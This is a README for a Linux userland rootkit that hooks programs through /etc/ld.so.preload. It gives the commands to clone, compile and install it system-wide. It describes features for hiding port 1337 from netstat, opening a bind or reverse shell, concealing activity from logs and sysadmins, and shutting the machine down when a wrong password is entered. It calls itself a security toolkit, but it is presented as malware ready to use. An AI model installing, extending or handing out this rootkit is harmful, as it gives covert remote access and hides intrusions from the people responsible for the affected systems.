Welcome to my rootkit userland This toolkit offers some cool and interesting functionalities designed to enhance your digital security. Let's dive into what it can do.
- git clone:
git clone https://github.com/DARKSECshell/ROOTKIT-USERLAND
- userland rootkit compilation
gcc DRK.c -o DRK.so -shared -fPIC -ldl
- moved library for /etc/ld.so.preload
echo "$(pwd)/DRK.so" > /etc/ld.so.preload && ldconfig
- Check rk loading
ldd /usr/bin/ls
When the digital attacker issues the command to kill port 1337, an interesting sequence of events unfolds:
-
Password Prompt: Upon attempting to kill port 1337, the rootkit will prompt for a password.
-
Password Verification: If the provided password matches the expected one, the rootkit will proceed to the next step.
-
Incorrect Password Handling: If the password provided does not match the expected one, the machine will initiate a shutdown process.
But what happens if the correct password is entered?
-
Port 1337 Hiding: The rootkit will stealthily hide port 1337 from detection. Even tools like
netstat(and possiblyssin the future) will be deceived. -
Bind Shell Activation: Additionally, the rootkit will activate a bind shell on the local machine. While firewalls may attempt to block it, the user will have the option to choose between a reverse shell or a bind shell.
-
Log Concealment: The rootkit ensures that commands like
tailwill have no effect. Sysadmins won't be able to spot suspicious activity in logs, nor will they be able to use other tools to inspect them. -
Future Plans: Looking ahead, I'm considering further enhancements to make the rootkit even more stealthy. For instance, I'm contemplating hiding
/etc/ld.so.preloadto minimize suspicion from sysadmins.